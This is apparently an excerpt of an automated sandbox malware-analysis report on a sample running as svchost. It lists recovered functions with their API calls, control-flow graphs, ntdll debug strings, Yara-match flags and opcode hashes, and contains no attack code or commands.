                                          • Instruction ID: 4c2db3f50435653be87fdf8d6a58eb032816d9e8d6e1fc640914c5323c749873
                                          • Opcode Fuzzy Hash: d50d47f08f1558f057d5d50af4955f50951a7d766de3ac934ba27d1afa362163
                                          • Instruction Fuzzy Hash: E8119071D4415CBAD7019EA58C42DEF777CDF51344F0540AEFA10AF203E6394E4647A9
                                          Function 00413AC3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 28 413ac3-413ae2 call 42e293 31 413ae8-413b2d call 417273 call 4046f3 call 424913 28->31 32 413ae3 call 42eca3 28->32 39 413b4d-413b53 31->39 40 413b2f-413b3e PostThreadMessageW 31->40 32->31 40->39 41 413b40-413b4a 40->41 41->39
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: 13f27cb120bce7ef212d6baadc346e71d7071e3ba32befbfdf505d968f7fdb4a
                                          • Instruction ID: b6af01b8b705b66541c63c8a1320813ea0937786d36182b91cb1b70c8a091e59
                                          • Opcode Fuzzy Hash: 13f27cb120bce7ef212d6baadc346e71d7071e3ba32befbfdf505d968f7fdb4a
                                          • Instruction Fuzzy Hash: D9012BB1D0015C7AEB10AAE19C82DEFBB7CDF41794F00806AFA0467202E5784F0647B5
                                          Function 00413ABD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 14 413abd-413ad5 15 413add-413ae2 14->15 16 413ad8 call 42e293 14->16 17 413ae8-413b2d call 417273 call 4046f3 call 424913 15->17 18 413ae3 call 42eca3 15->18 16->15 25 413b4d-413b53 17->25 26 413b2f-413b3e PostThreadMessageW 17->26 18->17 26->25 27 413b40-413b4a 26->27 27->25
                                          APIs
                                          • PostThreadMessageW.USER32(30G910fd,00000111,00000000,00000000), ref: 00413B3A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: MessagePostThread
                                          • String ID: 30G910fd$30G910fd
                                          • API String ID: 1836367815-2140840037
                                          • Opcode ID: d1ce65ee99baeeff285e5ab2b308634cef606b1e228db8cb64088192602b74fa
                                          • Instruction ID: 8577b45de724b45c6a442faf0f86e2058518f9fb1884a09e8d4ffd2d1505b06e
                                          • Opcode Fuzzy Hash: d1ce65ee99baeeff285e5ab2b308634cef606b1e228db8cb64088192602b74fa
                                          • Instruction Fuzzy Hash: 16010CB1D0015CBAEB11AAE1DC81DEF7B7CDF41394F00406AFA0467202E6794E464BB5
                                          Function 0042C463 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 78 42c463-42c4a4 call 404783 call 42d363 RtlFreeHeap
                                          APIs
                                          • RtlFreeHeap.NTDLL(00000000,00000004,00000000,A0F52DE5,00000007,00000000,00000004,00000000,00416AF9,000000F4), ref: 0042C49F
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction ID: 3e5b83701a0619aee715de283415b966ebc4b10f46454db6a7e9f0f0a1907582
                                          • Opcode Fuzzy Hash: 9d6b6e8f6847e82904c7d978e879e3a85c0fcb5c4f7c0134554bb6c8ddfafde6
                                          • Instruction Fuzzy Hash: 71E06D712042047BC614EE59DC41F9B37ACEFC9714F000019FE18A7241C670B91087B9
                                          Function 0042C413 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 73 42c413-42c457 call 404783 call 42d363 RtlAllocateHeap
                                          APIs
                                          • RtlAllocateHeap.NTDLL(?,0041E05E,?,?,00000000,?,0041E05E,?,?,?), ref: 0042C452
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AllocateHeap
                                          • String ID:
                                          • API String ID: 1279760036-0
                                          • Opcode ID: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction ID: 4203673ef09efe41aa39daa9bc5d7d39d72a13cfc4178b2adf3e21d945a7806e
                                          • Opcode Fuzzy Hash: c9e54603b4f54ebcb22d8f0863311e59ec884a1d81b183e57f98aee58c681ad4
                                          • Instruction Fuzzy Hash: E5E06D716002147BC610EE59EC41F9B37ACEFC5B10F404419FE58AB242C671B91087B9
                                          Function 0042C4B3 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 88 42c4b3-42c4ef call 404783 call 42d363 ExitProcess
                                          APIs
                                          • ExitProcess.KERNEL32(?,00000000,00000000,?,C86F0502,?,?,C86F0502), ref: 0042C4EA
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1541457922.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_400000_svchost.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExitProcess
                                          • String ID:
                                          • API String ID: 621844428-0
                                          • Opcode ID: d5cb3f6058f9be6b149dfd53384264be60094e4cbbfe259bbee28147f61b8151
                                          • Instruction ID: 64836b3dcdb75f89750afefb308aee4408def90b62afbd9de15a3f80c8f9bf60
                                          • Opcode Fuzzy Hash: d5cb3f6058f9be6b149dfd53384264be60094e4cbbfe259bbee28147f61b8151
                                          • Instruction Fuzzy Hash: 90E04F322002147BD610EA9ADC41FAB776CDFC5714F144019FE58A7182C675790087F5
                                          Function 03672C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 93 3672c0a-3672c0f 94 3672c11-3672c18 93->94 95 3672c1f-3672c26 LdrInitializeThunk 93->95
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                          • Instruction ID: 8879c64833d99df56973c153897a30f1d1648756cce15cdd82e5853e14c7e5b8
                                          • Opcode Fuzzy Hash: 9d5e928524a29dda8aaa5c14ada1cb18c27ed4adcf9f41b98dc9bbad4bc75352
                                          • Instruction Fuzzy Hash: B4B09B719015C5C5DA51F7604708717790567D1701F59C561D3030755F4779C1D1E175

                                          Non-executed Functions

                                          Function 036B2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-2160512332
                                          • Opcode ID: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                          • Instruction ID: 579dbb5c965ea333aca3dc55a386f555582a637ebc135a81a8874d41969481f9
                                          • Opcode Fuzzy Hash: 37b12cec14bd1b1e05cd17cd46f08cae87ef28e74e10486562a68b379ed6b726
                                          • Instruction Fuzzy Hash: 56929975608341ABD720DE24C890BABB7F8BB88754F184D2DFA949B350D770E885CF96
                                          Function 036268B8 Relevance: 19.0, Strings: 15, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ApphelpCheckModule$Could not locate procedure "%s" in the shim engine DLL$LdrpGetShimEngineInterface$SE_DllLoaded$SE_DllUnloaded$SE_GetProcAddressForCaller$SE_InitializeEngine$SE_InstallAfterInit$SE_InstallBeforeInit$SE_LdrEntryRemoved$SE_LdrResolveDllName$SE_ProcessDying$SE_ShimDllLoaded$apphelp.dll$minkernel\ntdll\ldrinit.c
                                          • API String ID: 0-3089669407
                                          • Opcode ID: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                          • Instruction ID: fe5cc9c18bd150f53253cd5fdb831e2684913840c2a20cfe30ccc87c1fa21018
                                          • Opcode Fuzzy Hash: 460f89aef6cec8c33ae17b34ddeb96396b67d5c8f14a3744fd1f13cb21fb8456
                                          • Instruction Fuzzy Hash: 168122B2D01618AF8B22FB98DDC5DEFB7FDAB15610B054525FA01FB104E724ED148BA0
                                          Function 03668620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                          Download Yara Rule
                                          Strings
                                          • Address of the debug info found in the active list., xrefs: 036A54AE, 036A54FA
                                          • Thread identifier, xrefs: 036A553A
                                          • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54E2
                                          • 8, xrefs: 036A52E3
                                          • double initialized or corrupted critical section, xrefs: 036A5508
                                          • undeleted critical section in freed memory, xrefs: 036A542B
                                          • Critical section debug info address, xrefs: 036A541F, 036A552E
                                          • Invalid debug info address of this critical section, xrefs: 036A54B6
                                          • Thread is in a state in which it cannot own a critical section, xrefs: 036A5543
                                          • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A540A, 036A5496, 036A5519
                                          • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 036A54CE
                                          • Critical section address, xrefs: 036A5425, 036A54BC, 036A5534
                                          • corrupted critical section, xrefs: 036A54C2
                                          • Critical section address., xrefs: 036A5502
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                          • API String ID: 0-2368682639
                                          • Opcode ID: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                          • Instruction ID: 45aac73e284e222e6b6ce09a7945f23b09bfe3a2b8026c3149431584cb2a7b77
                                          • Opcode Fuzzy Hash: 901b5db5c862ce80c417aeb69ce44e4ca8714589b9262d274409f882408629be
                                          • Instruction Fuzzy Hash: E6819DB0A00758EFDB20CF98C941BAEBBB9FB49710F184159F659BB241D375A941CF60
                                          Function 03660F30 Relevance: 13.3, Strings: 10, Instructions: 764COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $!$%$%%%u$%%%u!%s!$0$9$h$l$w
                                          • API String ID: 0-360209818
                                          • Opcode ID: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                          • Instruction ID: e17fecd882923972afb8290998e97f09edcb071017f5b709de10eee5121f10f8
                                          • Opcode Fuzzy Hash: 179af670409d6ee83614192e47aa7ff7d291949fba0f0d6c72591bd193f3ff25
                                          • Instruction Fuzzy Hash: 06628FB5E006298FDB24CF18C9417A9B7B6EF96310F5882DAD449AB340D7729EE1CF50
                                          Function 036E12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
                                          • API String ID: 0-3591852110
                                          • Opcode ID: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                          • Instruction ID: c7e5ab7149c905e8582025eb4fa73cd6962cf932f39ae9c2765d505d8e99d2cb
                                          • Opcode Fuzzy Hash: c649eca0ecb7d5d24c71e40f20c9db7ea8caae3da64fca9e55583e340940f5c1
                                          • Instruction Fuzzy Hash: C012CC74601642DFCB25CF28C545BBABBF5FF0A704F188459E4968B782D734E889EB60
                                          Function 0364AD00 Relevance: 11.8, Strings: 9, Instructions: 509COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: DLL name: %wZ$DLL search path passed in externally: %ws$LdrGetDllHandleEx$LdrpFindLoadedDllInternal$LdrpInitializeDllPath$Status: 0x%08lx$minkernel\ntdll\ldrapi.c$minkernel\ntdll\ldrfind.c$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-3197712848
                                          • Opcode ID: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                          • Instruction ID: 795c46e2df0cc8f555d5d447516d9f282f181ef251fdc5b1e61611109ce8c171
                                          • Opcode Fuzzy Hash: 1ac064034c0d2c80aa3e91ff19a6cd1f59df3e96e3de8cb2fb1390c52900c032
                                          • Instruction Fuzzy Hash: 4512FE71A083419FD724DF68C940BAAB7E8BF85B04F08496EF8C58B381E774D945CB92
                                          Function 0362D34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
                                          • API String ID: 0-3532704233
                                          • Opcode ID: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                          • Instruction ID: 3889651b34ef4b7b7e461938dcb844dcc8261e10efd52513ff04f19d353db04f
                                          • Opcode Fuzzy Hash: 2fa499dab1739731274f3664558fec01f46db9498b3d81da4fb0a6d67204d1bb
                                          • Instruction Fuzzy Hash: A9B1BD715087619FC721EF64C580A6BBBE8AF88744F06492EF899E7340D770D949CFA2
                                          Function 036E0CB5 Relevance: 10.4, Strings: 8, Instructions: 402COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: HEAP: $HEAP[%wZ]: $Non-Dedicated free list element %p is out of order$Number of free blocks in arena (%ld) does not match number in the free lists (%ld)$Pseudo Tag %04x size incorrect (%Ix != %Ix) %p$Tag %04x (%ws) size incorrect (%Ix != %Ix) %p$Total size of free blocks in arena (%Id) does not match number total in heap header (%Id)$dedicated (%04Ix) free list element %p is marked busy
                                          • API String ID: 0-1357697941
                                          • Opcode ID: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                          • Instruction ID: f9960eacd882f8698372767dc80e4e0f065a5b28fd14e252291b0af2dddba3c6
                                          • Opcode Fuzzy Hash: 103acd7d7ec564acf7d07e89c136e36fe58558bf3d77339d6da66afacafab9e4
                                          • Instruction Fuzzy Hash: 2BF11435A05655EFCB25CF6AC440BAAFBF5FF0A704F088059E4929B382C7B4A949DF50
                                          Function 036C9179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                          • API String ID: 0-3063724069
                                          • Opcode ID: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                          • Instruction ID: 61ce727a3c23c3f364e3a98415374876f01d044730021300aec43b057caf5ffa
                                          • Opcode Fuzzy Hash: 7a9e26e6a5c68c2af10545e8cdc4c39cac6eb79fe9788ca00ff0ba153189ebfc
                                          • Instruction Fuzzy Hash: 79D1E372814395AFE721DB64C840BBFBBE8EF84714F48492DFA849B250D770D914CB96
                                          Function 036E0274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                          • API String ID: 0-1700792311
                                          • Opcode ID: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                          • Instruction ID: f0164e6b87c13e6c750d619c1bac27a5e9d3dd3b5db1fc0d2d676a67cefd902a
                                          • Opcode Fuzzy Hash: f2a5523afdce4ce977b8cd870b31103a34b0afbc92692948a2e92e7ef25879c5
                                          • Instruction Fuzzy Hash: A2D1DC39A01A81DFCB22DF6AC540AAEBBF1FF4A710F198049E4559F352C7B49949CF18
                                          Function 0362D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                          Download Yara Rule
                                          Strings
                                          • @, xrefs: 0362D0FD
                                          • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0362D0CF
                                          • @, xrefs: 0362D2AF
                                          • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0362D146
                                          • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0362D2C3
                                          • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0362D262
                                          • @, xrefs: 0362D313
                                          • Control Panel\Desktop\LanguageConfiguration, xrefs: 0362D196
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                          • API String ID: 0-1356375266
                                          • Opcode ID: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                          • Instruction ID: cb85851827e826fcad21753db50097ac4547b48c8a4419d4333d8fff569c9925
                                          • Opcode Fuzzy Hash: 72e69bebd7e70c3fd46cb39334945dfd6b6de61d69092ec852a43d40fe452e05
                                          • Instruction Fuzzy Hash: CFA1BD719087159FD321DF20C584BABBBE8BB88715F014D2EFAA896240E774D908CF97
                                          Function 03649EB0 Relevance: 9.2, Strings: 7, Instructions: 499COMMON
                                          Download Yara Rule
                                          Strings
                                          • minkernel\ntdll\sxsisol.cpp, xrefs: 03697713, 036978A4
                                          • Internal error check failed, xrefs: 03697718, 036978A9
                                          • Status != STATUS_NOT_FOUND, xrefs: 0369789A
                                          • @, xrefs: 03649EE7
                                          • sxsisol_SearchActCtxForDllName, xrefs: 036976DD
                                          • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 036976EE
                                          • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 03697709
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                          • API String ID: 0-761764676
                                          • Opcode ID: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                          • Instruction ID: ce9a9625f476e71c852b35efcb2517c31bb16415e025f6bd00a69f6157030bd8
                                          • Opcode Fuzzy Hash: 9821035e8a453014ece937f37ce2b2cfc807442c344fa801961c18b93b8bfb36
                                          • Instruction Fuzzy Hash: 8D127E74E00215DBDF24CFA8C981AAEB7F8FF49714F1884AAE845EB341E7349851CB65
                                          Function 0363EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                          • API String ID: 0-1109411897
                                          • Opcode ID: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                          • Instruction ID: a645f34ba35d29ffbd308ebaab3d8fc28a150dd271f91b5ccc4638435b5d80d1
                                          • Opcode Fuzzy Hash: ada50179064d68e9e76df560ba570b3cc2044666056b4715a352dcda5ff2da1e
                                          • Instruction Fuzzy Hash: 8FA23875E056298BDF65CF19CD887A9B7B9AF46304F1442EAD80DAB350DB319E82CF10
                                          Function 0362F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                          • API String ID: 0-523794902
                                          • Opcode ID: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                          • Instruction ID: 322ca20196072f33bce53155b931c741b8985e9b5cbddc862d19e15b93ee4729
                                          • Opcode Fuzzy Hash: 72a5aef6ef6444e9595da745d8e539337873a800b6722f11a1ecf024c2a3e55f
                                          • Instruction Fuzzy Hash: C742FE75608B919FC714EF28C590A2AFBE5FF89204F094A6DE8868F381D730D842CF56
                                          Function 0363ADE0 Relevance: 8.1, Strings: 6, Instructions: 573COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: #$H$J$LdrpResSearchResourceMappedFile Enter$LdrpResSearchResourceMappedFile Exit$MUI
                                          • API String ID: 0-4098886588
                                          • Opcode ID: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                          • Instruction ID: ad6ac6569fc788e4d372939171c662bfd6d1268261e2ddd578ef8a0af49df29f
                                          • Opcode Fuzzy Hash: ba60c781db9624c796876b0880fc3e603f99dfd227fa986c71e2263b01d80aef
                                          • Instruction Fuzzy Hash: B432A175E042698BEF22CF14CD94BEEBBB9AF46340F1841EAE449A7350D7719E818F44
                                          Function 0364B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                          • API String ID: 0-122214566
                                          • Opcode ID: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                          • Instruction ID: 61a59e040741913a494003336e544fdeb4c8de8bb2103f00a1675c65baf34e3b
                                          • Opcode Fuzzy Hash: 8b98c884ee7763cdcea8c0fa9e12bbbeac5b2a7a574e0a433387637bb75a6b34
                                          • Instruction Fuzzy Hash: E0C14B31E00215ABDF25CF69C881BBFBB69AF46710F184069E8869F381E7B4DD45C7A4
                                          Function 036663FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
